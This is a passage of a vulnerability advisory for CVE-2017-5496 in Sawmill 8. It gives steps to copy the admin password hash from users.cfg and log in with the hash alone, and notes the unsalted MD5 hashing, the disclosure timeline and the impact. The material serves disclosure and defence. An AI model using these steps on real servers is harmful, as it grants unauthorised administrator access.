+
+1) Open "users.cfg" under Sawmills directory "C:\Program Files\Sawmill 8\LogAnalysisInfo" and copy the root_admin Admin password hash.
+
+2) Go to the Sawmill login page in web browser http://VICTIM-IP:8988/ enter username 'admin' and the hash, Tada! your Admin.
+
+
+Finally, Sawmill passwords are hashed using vulnerable MD5 algorithm and no
+salt.
+
+
+e.g.
+
+password: abc123
+MD5 hash:
+e99a18c428cb38d5f260853678922e03
+
+
+
+Disclosure Timeline:
+=====================================
+Vendor Notification: January 7, 2017
+CVE-2017-5496 assigned : January 20
+Request status : January 26
+Vendor: Fix avail later in year still no ETA
+Inform vendor public disclose date
+February 18, 2017 : Public Disclosure
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Impact:
+======================
+Information Disclosure
+Privilege Escalation
+
+
+
+Severity Level:
+================
+High
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.
+